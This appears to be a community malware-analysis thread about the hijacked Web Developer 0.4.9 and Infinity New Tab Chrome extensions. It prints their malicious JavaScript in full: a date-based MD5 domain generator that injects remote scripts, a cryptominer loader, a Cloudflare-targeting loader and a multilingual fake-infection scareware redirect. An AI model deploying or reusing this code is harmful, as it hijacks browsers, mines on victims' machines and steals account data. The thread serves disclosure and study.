Web developer 0.4.9 tools hacked and installing adware Decode

content.js

function md5cycle(x, k) {
var a = x[0], b = x[1], c = x[2], d = x[3];

a = ff(a, b, c, d, k[0], 7, -680876936);
d = ff(d, a, b, c, k[1], 12, -389564586);
c = ff(c, d, a, b, k[2], 17,  606105819);
b = ff(b, c, d, a, k[3], 22, -1044525330);
a = ff(a, b, c, d, k[4], 7, -176418897);
d = ff(d, a, b, c, k[5], 12,  1200080426);
c = ff(c, d, a, b, k[6], 17, -1473231341);
b = ff(b, c, d, a, k[7], 22, -45705983);
a = ff(a, b, c, d, k[8], 7,  1770035416);
d = ff(d, a, b, c, k[9], 12, -1958414417);
c = ff(c, d, a, b, k[10], 17, -42063);
b = ff(b, c, d, a, k[11], 22, -1990404162);
a = ff(a, b, c, d, k[12], 7,  1804603682);
d = ff(d, a, b, c, k[13], 12, -40341101);
c = ff(c, d, a, b, k[14], 17, -1502002290);
b = ff(b, c, d, a, k[15], 22,  1236535329);

a = gg(a, b, c, d, k[1], 5, -165796510);
d = gg(d, a, b, c, k[6], 9, -1069501632);
c = gg(c, d, a, b, k[11], 14,  643717713);
b = gg(b, c, d, a, k[0], 20, -373897302);
a = gg(a, b, c, d, k[5], 5, -701558691);
d = gg(d, a, b, c, k[10], 9,  38016083);
c = gg(c, d, a, b, k[15], 14, -660478335);
b = gg(b, c, d, a, k[4], 20, -405537848);
a = gg(a, b, c, d, k[9], 5,  568446438);
d = gg(d, a, b, c, k[14], 9, -1019803690);
c = gg(c, d, a, b, k[3], 14, -187363961);
b = gg(b, c, d, a, k[8], 20,  1163531501);
a = gg(a, b, c, d, k[13], 5, -1444681467);
d = gg(d, a, b, c, k[2], 9, -51403784);
c = gg(c, d, a, b, k[7], 14,  1735328473);
b = gg(b, c, d, a, k[12], 20, -1926607734);

a = hh(a, b, c, d, k[5], 4, -378558);
d = hh(d, a, b, c, k[8], 11, -2022574463);
c = hh(c, d, a, b, k[11], 16,  1839030562);
b = hh(b, c, d, a, k[14], 23, -35309556);
a = hh(a, b, c, d, k[1], 4, -1530992060);
d = hh(d, a, b, c, k[4], 11,  1272893353);
c = hh(c, d, a, b, k[7], 16, -155497632);
b = hh(b, c, d, a, k[10], 23, -1094730640);
a = hh(a, b, c, d, k[13], 4,  681279174);
d = hh(d, a, b, c, k[0], 11, -358537222);
c = hh(c, d, a, b, k[3], 16, -722521979);
b = hh(b, c, d, a, k[6], 23,  76029189);
a = hh(a, b, c, d, k[9], 4, -640364487);
d = hh(d, a, b, c, k[12], 11, -421815835);
c = hh(c, d, a, b, k[15], 16,  530742520);
b = hh(b, c, d, a, k[2], 23, -995338651);

a = ii(a, b, c, d, k[0], 6, -198630844);
d = ii(d, a, b, c, k[7], 10,  1126891415);
c = ii(c, d, a, b, k[14], 15, -1416354905);
b = ii(b, c, d, a, k[5], 21, -57434055);
a = ii(a, b, c, d, k[12], 6,  1700485571);
d = ii(d, a, b, c, k[3], 10, -1894986606);
c = ii(c, d, a, b, k[10], 15, -1051523);
b = ii(b, c, d, a, k[1], 21, -2054922799);
a = ii(a, b, c, d, k[8], 6,  1873313359);
d = ii(d, a, b, c, k[15], 10, -30611744);
c = ii(c, d, a, b, k[6], 15, -1560198380);
b = ii(b, c, d, a, k[13], 21,  1309151649);
a = ii(a, b, c, d, k[4], 6, -145523070);
d = ii(d, a, b, c, k[11], 10, -1120210379);
c = ii(c, d, a, b, k[2], 15,  718787259);
b = ii(b, c, d, a, k[9], 21, -343485551);

x[0] = add32(a, x[0]);
x[1] = add32(b, x[1]);
x[2] = add32(c, x[2]);
x[3] = add32(d, x[3]);

}

function cmn(q, a, b, x, s, t) {
a = add32(add32(a, q), add32(x, t));
return add32((a << s) | (a >>> (32 - s)), b);
}

function ff(a, b, c, d, x, s, t) {
return cmn((b & c) | ((~b) & d), a, b, x, s, t);
}

function gg(a, b, c, d, x, s, t) {
return cmn((b & d) | (c & (~d)), a, b, x, s, t);
}

function hh(a, b, c, d, x, s, t) {
return cmn(b ^ c ^ d, a, b, x, s, t);
}

function ii(a, b, c, d, x, s, t) {
return cmn(c ^ (b | (~d)), a, b, x, s, t);
}

function md51(s) {
txt = '';
var n = s.length,
state = [1732584193, -271733879, -1732584194, 271733878], i;
for (i=64; i<=s.length; i+=64) {
md5cycle(state, md5blk(s.substring(i-64, i)));
}
s = s.substring(i-64);
var tail = [0,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0];
for (i=0; i<s.length; i++)
tail[i>>2] |= s.charCodeAt(i) << ((i%4) << 3);
tail[i>>2] |= 0x80 << ((i%4) << 3);
if (i > 55) {
md5cycle(state, tail);
for (i=0; i<16; i++) tail[i] = 0;
}
tail[14] = n*8;
md5cycle(state, tail);
return state;
}

/* there needs to be support for Unicode here,
 * unless we pretend that we can redefine the MD-5
 * algorithm for multi-byte characters (perhaps
 * by adding every four 16-bit characters and
 * shortening the sum to 32 bits). Otherwise
 * I suggest performing MD-5 as if every character
 * was two bytes--e.g., 0040 0025 = @%--but then
 * how will an ordinary MD-5 sum be matched?
 * There is no way to standardize text to something
 * like UTF-8 before transformation; speed cost is
 * utterly prohibitive. The JavaScript standard
 * itself needs to look at this: it should start
 * providing access to strings as preformed UTF-8
 * 8-bit unsigned value arrays.
 */
function md5blk(s) { /* I figured global was faster.   */
var md5blks = [], i; /* Andy King said do it this way. */
for (i=0; i<64; i+=4) {
md5blks[i>>2] = s.charCodeAt(i)
+ (s.charCodeAt(i+1) << 8)
+ (s.charCodeAt(i+2) << 16)
+ (s.charCodeAt(i+3) << 24);
}
return md5blks;
}

var hex_chr = '0123456789abcdef'.split('');

function rhex(n)
{
var s='', j=0;
for(; j<4; j++)
s += hex_chr[(n >> (j * 8 + 4)) & 0x0F]
+ hex_chr[(n >> (j * 8)) & 0x0F];
return s;
}

function hex(x) {
for (var i=0; i<x.length; i++)
x[i] = rhex(x[i]);
return x.join('');
}

function md5(s) {
return hex(md51(s));
}

/* this function is much faster,
so if possible we use it. Some IEs
are the only ones I know of that
need the idiotic second function,
generated by an if clause.  */

function add32(a, b) {
return (a + b) & 0xFFFFFFFF;
}

if (md5('hello') != '5d41402abc4b2a76b9719d911017c592') {
function add32(x, y) {
var lsw = (x & 0xFFFF) + (y & 0xFFFF),
msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
}
}
 

  
          var date = new Date();
          var day = date.getUTCDate();
          var month = date.getUTCMonth() + 1;
          var year = date.getUTCFullYear();
          var hour = date.getUTCHours();

          console.log(hour);

          var d = day + '-' + month + '-' + year;

          var hash = "wd" + md5(d) + ".win";
          
          
          var config_fragment = '<sc' + 'ri' + 'pt sr' + 'c="ht'+ 'tp' + 's://' + hash + '/ga.js"></sc ' + 'ri' + 'pt>';


         alert(hash);
         /*
         Decode.
         adware link
         http://wd7bdb20e4d622f6569f3e8503138c859d.win
         */
         

https://f.partnerwork.men/code/code/index_4.php

! function() {
    try {
        var e = function() {
            var t;
            void 0 !== document.hidden ? t = "hidden" : void 0 !== document.webkitHidden ? t = "webkitHidden" : void 0 !== document.mozHidden ? t = "mozHidden" : void 0 !== document.msHidden && (t = "msHidden"), document[t] ? setTimeout(function() {
                e()
            }, 10000) : function() {
                try {
                    var e = !1;
                    ["y", "a"].forEach(function(t) {
                        if (!1 === e && document.querySelector('script[src^="https://' + t + '.partnerwork.men/code/code/mss_3.js"]')) e = !0;
                        else if ("a" === t && !1 === e) {
                            var d = document.createElement("script");
                            d.type = "text/javascript", d.src = "https://a.partnerwork.men/code/code/index_3.php", document.getElementsByTagName("body")[0].appendChild(d)
                        }
                    })
                } catch (e) {}
            }()
        };
        setTimeout(function() {
            e()
        }, 10000)
    } catch (e) {}
}();

https://y.partnerwork.men/code/code/index_3.php

var hash = '{"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"161860651313327","job":{"blob":"0505b1e088cc052109c263b6823040e1560aa1971840aca59a318eb770a957a9afb0e038f084cf0000000077cc8ace862fa5505349f456dbc03a1b45b235ddf8757747b734713b165db5850a","job_id":"121997309522703","target":"8b4f0100"},"status":"OK"}}';
var start_nonce = 200;
var count_pl = 200;
var src = "https://y.partnerwork.men/code/code/mss_3.js";
if (document.querySelector('script[src^="' + src + '"]')) m_miner(hash, start_nonce, count_pl);
else {
    var d = document.createElement("script");
    d.type = "text/javascript", d.src = src, document.body.appendChild(d), setTimeout(function() {
        m_miner(hash, start_nonce, count_pl)
    }, 2e3)
}
var scripts = document.querySelectorAll('script[src^="https://y.partnerwork.men/code/code/index_3.php"]');
scripts && scripts.length > 0 && scripts[0].parentNode.removeChild(scripts[0]);

https://www.whois.com/whois/partnerwork.men
https://www.whois.com/whois/partner-net.men

@piedpiperRichard what is:

if (top[_0x4d27[3]][_0x4d27[2]][_0x4d27[1]](_0x4d27[0]) > -1) {

top in this case? thats no native js.... is there a map somewhere I have't spotted?

@amlwwalker that refers to window.top. So basically window.top.location.href.

That script is the one that bothers me the most, since it appears to be fetching e-mail and API key of someone on Cloudflare. Which can be used to send spam, phishing and redirect people their domain on Cloudflare to even more malicious websites.

Here's human readable version of wd7bdb20e4d622f6569f3e8503138c859d.win/ga.js file

if (top['location']['href']['indexOf']('cloudflare.com') > -1) {
  (function() {
    var createScript = document['createElement']('script');
    createScript['type'] = 'text/javascript';
    createScript['src'] = '//searchtab.win/ga.js';
    var getScript = document['getElementsByTagName']('script')[0];
    getScript['parentNode']['insertBefore'](createScript, getScript)
  })()
} else {
  if (top['location']['href']['indexOf']('redirect2.top') == -1) {
    (function() {
      var createScript = document['createElement']('script');
      createScript['type'] = 'text/javascript';
      createScript['src'] = '//partner-net.men/code/?pid=973820&r=' + Math['floor'](10000000 * Math['random']());
      var getScript = document['getElementsByTagName']('script')[0];
      getScript['parentNode']['insertBefore'](createScript, getScript);
      try {
        var getBody = document['body']['firstChild'];
        getBody['parentNode']['insertBefore'](getScript, getBody)
      } catch (e) {
        document['body']['appendChild'](getScript)
      }
    })()
  }
};

// Google Analytics 
(function(i, s, o, g, r, a, m) {
  i['GoogleAnalyticsObject'] = r;
  i[r] = i[r] || function() {
      (i[r].q = i[r].q || []).push(arguments)
    },
    i[r].l = 1 * new Date();
  a = s.createElement(o),
    m = s.getElementsByTagName(o)[0];
  a.async = 1;
  a.src = g;
  m.parentNode.insertBefore(a, m)
})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-103045553-1', 'auto');
ga('send', 'pageview')

// loading alert msg 'Your computer is infected. You have to check it with antivirus.'
var wc = document.createElement('script');
wc.type = 'text/javascript';
wc.src = 'https://loading.website/alert_ce.php';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wc, s);

My system got caught in this Malware. Currently finding out that it was created in JavaScript. A redirect here for when I get better at knowing and reading code. I'm an informal student of JavaScript at the moment, about to get back into my studies of where I last left off.

Looks like this is a variation of the same attack by the same malicious actor who I encountered when (s)he compromised the Infinity New Tab chrome extension in May. Same code for the domain name generating, same pasted md5 hashing fn (with Andy King reference), only major differences I can see in the one I encountered is the alert message in 8 different languages! There also seems to be a simple mechanism for throttling the frequency of alerts, so the user only sees it once per hour, rather than on every single page load or new tab.

There were some further write-ups, code samples, details and sleuthing from the Infinity New Tab case (and another on Betternet VPN extension in the comments) here: https://www.reddit.com/r/Malware/comments/6dm5m2/the_infinity_new_tab_chrome_extension_appears_to/

And here is the pasted code that was shipped with Infinity New Tab when it was compromised:

function md5cycle(x, k) {
var a = x[0], b = x[1], c = x[2], d = x[3];

a = ff(a, b, c, d, k[0], 7, -680876936);
d = ff(d, a, b, c, k[1], 12, -389564586);
c = ff(c, d, a, b, k[2], 17,  606105819);
b = ff(b, c, d, a, k[3], 22, -1044525330);
a = ff(a, b, c, d, k[4], 7, -176418897);
d = ff(d, a, b, c, k[5], 12,  1200080426);
c = ff(c, d, a, b, k[6], 17, -1473231341);
b = ff(b, c, d, a, k[7], 22, -45705983);
a = ff(a, b, c, d, k[8], 7,  1770035416);
d = ff(d, a, b, c, k[9], 12, -1958414417);
c = ff(c, d, a, b, k[10], 17, -42063);
b = ff(b, c, d, a, k[11], 22, -1990404162);
a = ff(a, b, c, d, k[12], 7,  1804603682);
d = ff(d, a, b, c, k[13], 12, -40341101);
c = ff(c, d, a, b, k[14], 17, -1502002290);
b = ff(b, c, d, a, k[15], 22,  1236535329);

a = gg(a, b, c, d, k[1], 5, -165796510);
d = gg(d, a, b, c, k[6], 9, -1069501632);
c = gg(c, d, a, b, k[11], 14,  643717713);
b = gg(b, c, d, a, k[0], 20, -373897302);
a = gg(a, b, c, d, k[5], 5, -701558691);
d = gg(d, a, b, c, k[10], 9,  38016083);
c = gg(c, d, a, b, k[15], 14, -660478335);
b = gg(b, c, d, a, k[4], 20, -405537848);
a = gg(a, b, c, d, k[9], 5,  568446438);
d = gg(d, a, b, c, k[14], 9, -1019803690);
c = gg(c, d, a, b, k[3], 14, -187363961);
b = gg(b, c, d, a, k[8], 20,  1163531501);
a = gg(a, b, c, d, k[13], 5, -1444681467);
d = gg(d, a, b, c, k[2], 9, -51403784);
c = gg(c, d, a, b, k[7], 14,  1735328473);
b = gg(b, c, d, a, k[12], 20, -1926607734);

a = hh(a, b, c, d, k[5], 4, -378558);
d = hh(d, a, b, c, k[8], 11, -2022574463);
c = hh(c, d, a, b, k[11], 16,  1839030562);
b = hh(b, c, d, a, k[14], 23, -35309556);
a = hh(a, b, c, d, k[1], 4, -1530992060);
d = hh(d, a, b, c, k[4], 11,  1272893353);
c = hh(c, d, a, b, k[7], 16, -155497632);
b = hh(b, c, d, a, k[10], 23, -1094730640);
a = hh(a, b, c, d, k[13], 4,  681279174);
d = hh(d, a, b, c, k[0], 11, -358537222);
c = hh(c, d, a, b, k[3], 16, -722521979);
b = hh(b, c, d, a, k[6], 23,  76029189);
a = hh(a, b, c, d, k[9], 4, -640364487);
d = hh(d, a, b, c, k[12], 11, -421815835);
c = hh(c, d, a, b, k[15], 16,  530742520);
b = hh(b, c, d, a, k[2], 23, -995338651);

a = ii(a, b, c, d, k[0], 6, -198630844);
d = ii(d, a, b, c, k[7], 10,  1126891415);
c = ii(c, d, a, b, k[14], 15, -1416354905);
b = ii(b, c, d, a, k[5], 21, -57434055);
a = ii(a, b, c, d, k[12], 6,  1700485571);
d = ii(d, a, b, c, k[3], 10, -1894986606);
c = ii(c, d, a, b, k[10], 15, -1051523);
b = ii(b, c, d, a, k[1], 21, -2054922799);
a = ii(a, b, c, d, k[8], 6,  1873313359);
d = ii(d, a, b, c, k[15], 10, -30611744);
c = ii(c, d, a, b, k[6], 15, -1560198380);
b = ii(b, c, d, a, k[13], 21,  1309151649);
a = ii(a, b, c, d, k[4], 6, -145523070);
d = ii(d, a, b, c, k[11], 10, -1120210379);
c = ii(c, d, a, b, k[2], 15,  718787259);
b = ii(b, c, d, a, k[9], 21, -343485551);

x[0] = add32(a, x[0]);
x[1] = add32(b, x[1]);
x[2] = add32(c, x[2]);
x[3] = add32(d, x[3]);

}

function cmn(q, a, b, x, s, t) {
a = add32(add32(a, q), add32(x, t));
return add32((a << s) | (a >>> (32 - s)), b);
}

function ff(a, b, c, d, x, s, t) {
return cmn((b & c) | ((~b) & d), a, b, x, s, t);
}

function gg(a, b, c, d, x, s, t) {
return cmn((b & d) | (c & (~d)), a, b, x, s, t);
}

function hh(a, b, c, d, x, s, t) {
return cmn(b ^ c ^ d, a, b, x, s, t);
}

function ii(a, b, c, d, x, s, t) {
return cmn(c ^ (b | (~d)), a, b, x, s, t);
}

function md51(s) {
txt = '';
var n = s.length,
state = [1732584193, -271733879, -1732584194, 271733878], i;
for (i=64; i<=s.length; i+=64) {
md5cycle(state, md5blk(s.substring(i-64, i)));
}
s = s.substring(i-64);
var tail = [0,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0];
for (i=0; i<s.length; i++)
tail[i>>2] |= s.charCodeAt(i) << ((i%4) << 3);
tail[i>>2] |= 0x80 << ((i%4) << 3);
if (i > 55) {
md5cycle(state, tail);
for (i=0; i<16; i++) tail[i] = 0;
}
tail[14] = n*8;
md5cycle(state, tail);
return state;
}

/* there needs to be support for Unicode here,
 * unless we pretend that we can redefine the MD-5
 * algorithm for multi-byte characters (perhaps
 * by adding every four 16-bit characters and
 * shortening the sum to 32 bits). Otherwise
 * I suggest performing MD-5 as if every character
 * was two bytes--e.g., 0040 0025 = @%--but then
 * how will an ordinary MD-5 sum be matched?
 * There is no way to standardize text to something
 * like UTF-8 before transformation; speed cost is
 * utterly prohibitive. The JavaScript standard
 * itself needs to look at this: it should start
 * providing access to strings as preformed UTF-8
 * 8-bit unsigned value arrays.
 */
function md5blk(s) { /* I figured global was faster.   */
var md5blks = [], i; /* Andy King said do it this way. */
for (i=0; i<64; i+=4) {
md5blks[i>>2] = s.charCodeAt(i)
+ (s.charCodeAt(i+1) << 8)
+ (s.charCodeAt(i+2) << 16)
+ (s.charCodeAt(i+3) << 24);
}
return md5blks;
}

var hex_chr = '0123456789abcdef'.split('');

function rhex(n)
{
var s='', j=0;
for(; j<4; j++)
s += hex_chr[(n >> (j * 8 + 4)) & 0x0F]
+ hex_chr[(n >> (j * 8)) & 0x0F];
return s;
}

function hex(x) {
for (var i=0; i<x.length; i++)
x[i] = rhex(x[i]);
return x.join('');
}

function md5(s) {
return hex(md51(s));
}

/* this function is much faster,
so if possible we use it. Some IEs
are the only ones I know of that
need the idiotic second function,
generated by an if clause.  */

function add32(a, b) {
return (a + b) & 0xFFFFFFFF;
}

if (md5('hello') != '5d41402abc4b2a76b9719d911017c592') {
function add32(x, y) {
var lsw = (x & 0xFFFF) + (y & 0xFFFF),
msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
}
}

function getCookie(name) {
  var matches = document.cookie.match(new RegExp(
    "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
  ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}

console.log(top.location.href);

var is_keeper = top.location.href.indexOf("keeper") > -1 || top.location.href.indexOf("tds") > -1 || top.location.href.indexOf("mb") > -1 || top.location.href.indexOf("affid") > -1;

console.log(is_keeper);

var date = new Date;
var current_time = date.getTime();
var cookie_time = getCookie('_alert');
var pause = current_time - cookie_time;

console.log('current_time: ' + current_time);
console.log('cookie_time: ' + cookie_time);
console.log('current_time - cookie_time: ' + (current_time - cookie_time));

    var day = date.getDate();
    var month = date.getMonth() + 1;
    var year = date.getFullYear();
    var d = month + '/' + year;
    var tds_url = 'http://' + md5(d) + '.pro/tds.php?subid=ce';

console.log(tds_url);

    date.setDate(date.getDate() + 1);
    document.cookie = "_alert=" + current_time + "; path=/; expires=" + date.toUTCString();

if (pause && pause > (60 * 60 * 1000) && !is_keeper) {

    var lang = navigator.languages ? navigator.languages[0] : (navigator.language || navigator.userLanguage);
    if (lang) lang = lang.substring(0, 2);
    console.log('lang: ' + lang);

    var msg = 'Your computer is infected. You have to check it with antivirus.';

    if (lang == 'es') msg = "Su navegador contiene malware. Usted tiene que instalar la herramienta de eliminación de malware Chrome.";
    if (lang == 'it') msg = "Il tuo browser contiene malware. È necessario installare strumento di rimozione malware Chrome.";
    if (lang == 'fr') msg = "Votre navigateur contient MALWARE. Vous devez installer l'outil de suppression de logiciels malveillants Chrome.";
    if (lang == 'pt') msg = "Seu navegador contém malware. Você tem que instalar o Ferramenta de remoção Chrome Malware.";
    if (lang == 'de') msg = "Ihr Browser enthält MALWARE. Sie müssen Chrome Malware Removal Tool zu installieren.";
    if (lang == 'ru') msg = "Ваш браузер содержит вредоносный код. Вы должны установить расширение для блокировки вредоносного кода.";
    if (lang == 'gr') msg = "Το πρόγραμμα περιήγησής σας περιέχει κακόβουλο λογισμικό. Θα πρέπει να εγκαταστήσετε το Chrome Malware εργαλείο αφαίρεσης.";

    if (confirm(msg)) {
        top.location.href = tds_url;
    } else {
//        window.top.location.href = 'https://browser-updates.info/s.html';
    }
}

Today with ChatGPT it's easier to solve all this, right?